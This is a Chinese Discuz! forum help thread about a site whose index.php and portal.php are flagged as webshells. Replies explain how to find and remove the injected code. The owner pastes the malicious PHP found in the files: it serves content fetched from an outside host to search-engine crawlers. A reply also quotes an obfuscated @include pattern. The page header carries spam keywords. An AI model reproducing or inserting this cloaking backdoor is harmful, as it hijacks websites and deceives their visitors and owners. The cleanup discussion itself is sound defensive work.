97久久国产亚洲精品超碰热,成人又色又爽的免费网站,色偷偷女人的天堂a,男女高潮喷水在线观看,国内精品一线二线三线区别在哪里

12下一頁(yè)
返回列表 發(fā)帖
查看: 15844|回復(fù): 11

[求助] 兩個(gè)文件總是提示為WEBSHELL

34

主題

162

回帖

216

積分

爐火純青

貢獻(xiàn)
0 點(diǎn)
金幣
4 個(gè)
QQ
樓主
發(fā)表于 2020-9-26 20:49:42 | 只看樓主 |倒序?yàn)g覽 |閱讀模式
警告 index.php文件為webshell;警告 portal.php文件為webshell;官方文件剛替換查殺也提示。后臺(tái)檢測(cè)也沒(méi)有文件被修改。
我知道答案 回答被采納將會(huì)獲得1 貢獻(xiàn) 已有11人回答

83

主題

2786

回帖

3569

積分

功行圓滿

貢獻(xiàn)
23 點(diǎn)
金幣
351 個(gè)
沙發(fā)
發(fā)表于 2020-9-27 01:46:03 | 只看Ta
若存在,處理前,先卸載所有盜版插件與模版。

進(jìn)discuz后臺(tái)找到工具-文件校驗(yàn),看下最近有哪些php文件被修改了。

1、排查網(wǎng)站源文件的php 文件,查看是否有出現(xiàn)IP地址、或者異常網(wǎng)站(上面跳轉(zhuǎn)的網(wǎng)站),如果有刪除就可以了。

2、排查網(wǎng)站源文件的php 文件,查看是否有如下代碼:@include($_SERVER['DOCUMENT_ROOT']

(排查一般用WEBshell后門掃描軟件掃描核查?。?br />
如果有就刪除此段代碼。并把該段代碼進(jìn)行解密。

舉例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代碼為:2F646174612F6176617461722F30

解密后為:/data/avatar/0

代碼解密地址:http://www.bejson.com/convert/ox2str/


意思就是在上述路徑下存在被非法上傳的文件,用于做快照劫持。

解決辦法:刪除上面的代碼和文件即可。

掛馬問(wèn)題解決了后,記得更改服務(wù)器相關(guān)的各種密碼,盡量設(shè)置的復(fù)雜一點(diǎn)。

34

主題

162

回帖

216

積分

爐火純青

貢獻(xiàn)
0 點(diǎn)
金幣
4 個(gè)
QQ
板凳
 樓主| 發(fā)表于 2020-9-27 13:08:51 | 只看Ta
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false||strpos($key,strtolower('Yahoo'))!== false||strpos($key,strtolower('bingbot'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://www.hack163.com/shou/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;
}


?>
在這幾個(gè)文件中加入了這樣一段代碼。

19

主題

2207

回帖

3322

積分

應(yīng)用開發(fā)者

貢獻(xiàn)
74 點(diǎn)
金幣
629 個(gè)
QQ
地板
發(fā)表于 2020-9-27 13:57:55 | 只看Ta
打開看看 是否被改了 對(duì)比官方文件

19

主題

2207

回帖

3322

積分

應(yīng)用開發(fā)者

貢獻(xiàn)
74 點(diǎn)
金幣
629 個(gè)
QQ
5#
發(fā)表于 2020-9-27 13:58:29 | 只看Ta
9axl 發(fā)表于 2020-9-27 13:08
在這幾個(gè)文件中加入了這樣一段代碼。

典型的掛馬了

34

主題

162

回帖

216

積分

爐火純青

貢獻(xiàn)
0 點(diǎn)
金幣
4 個(gè)
QQ
6#
 樓主| 發(fā)表于 2020-9-28 10:02:27 | 只看Ta
空間商技術(shù)人員說(shuō)是DZ程序漏洞,被注入。

19

主題

2207

回帖

3322

積分

應(yīng)用開發(fā)者

貢獻(xiàn)
74 點(diǎn)
金幣
629 個(gè)
QQ
7#
發(fā)表于 2020-9-28 11:39:25 | 只看Ta
9axl 發(fā)表于 2020-9-28 10:02
空間商技術(shù)人員說(shuō)是DZ程序漏洞,被注入。

我可以反過(guò)來(lái)說(shuō) 空間商空間有漏洞被注入了嗎

空間商甩鍋啊 要解決 而不是推卸責(zé)任

83

主題

2786

回帖

3569

積分

功行圓滿

貢獻(xiàn)
23 點(diǎn)
金幣
351 個(gè)
8#
發(fā)表于 2020-9-28 18:47:44 | 只看Ta
9axl 發(fā)表于 2020-9-28 01:02
空間商技術(shù)人員說(shuō)是DZ程序漏洞,被注入。

不負(fù)責(zé)任空間,及早備份搬家去。

11

主題

274

回帖

433

積分

爐火純青

貢獻(xiàn)
0 點(diǎn)
金幣
118 個(gè)
9#
發(fā)表于 2020-9-28 22:18:25 來(lái)自手機(jī) | 只看Ta
crx349 發(fā)表于 2020-9-28 11:39
我可以反過(guò)來(lái)說(shuō) 空間商空間有漏洞被注入了嗎

空間商甩鍋啊 要解決 而不是推卸責(zé)任 ...

真不怪空間商,說(shuō)白了你就是用盜版插件或者模板造成的

34

主題

162

回帖

216

積分

爐火純青

貢獻(xiàn)
0 點(diǎn)
金幣
4 個(gè)
QQ
10#
 樓主| 發(fā)表于 2020-9-29 13:17:45 | 只看Ta
現(xiàn)在我將網(wǎng)站里面的所有文件都移到一個(gè)新建的OLD文件夾里,然后,全新上傳了3。4,現(xiàn)在看看有怎樣的結(jié)果。

本版積分規(guī)則

  • 關(guān)注公眾號(hào)
  • 有償服務(wù)微信
  • 有償服務(wù)QQ

手機(jī)版|小黑屋|Discuz! 官方交流社區(qū) ( 皖I(lǐng)CP備16010102號(hào) |皖公網(wǎng)安備34010302002376號(hào) )|網(wǎng)站地圖|star

GMT+8, 2025-10-21 00:40 , Processed in 0.052994 second(s), 8 queries , Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2025 Discuz! Team.

關(guān)燈 在本版發(fā)帖
有償服務(wù)QQ
有償服務(wù)微信
 返回頂部
快速回復(fù) 返回頂部 返回列表